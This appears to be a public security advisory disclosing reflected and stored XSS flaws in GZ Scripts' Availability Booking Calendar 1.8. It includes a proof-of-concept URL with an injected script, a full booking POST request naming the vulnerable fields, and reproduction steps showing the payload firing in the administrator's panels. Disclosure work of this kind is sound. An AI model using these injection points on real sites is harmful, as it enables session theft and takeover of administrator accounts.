┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/availability-booking-calendar-php.html │ │ Vendor : GZ Scripts │ │ Software : Availability Booking Calendar 1.8 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /load.php GET 'cid' parameter is vulnerable to RXSS https://website/load.php?controller=GzFront&action=calendar&cid=1vqvby%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg6vt7wmumdm&view_month=1&cal_id=1&month=7&year=2023 ## Stored XSS ----------------------------------------------- POST /AvailabilityBookingCalendarPHP/load.php?controller=GzFront&action=checkout&cid=1 HTTP/1.1 date_range=03.07.2023+-+04.07.2023&abadults=&abchildren=&adults=1&children=1&promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=000&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=yyy&state=sss&zip=00000&country=LEB&terms=1&start_date=1688342400&end_date=1688428800&cal_id=1&calendar_id=1&from_date=1688342400&to_date=1688428800&payment_method=pay_arrival&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Address Line 1" 5. Inject your [XSS Payload] in "Country" 6. Accept with terms & Press [Booking] XSS Fired on Local User Browser 7. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 8. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done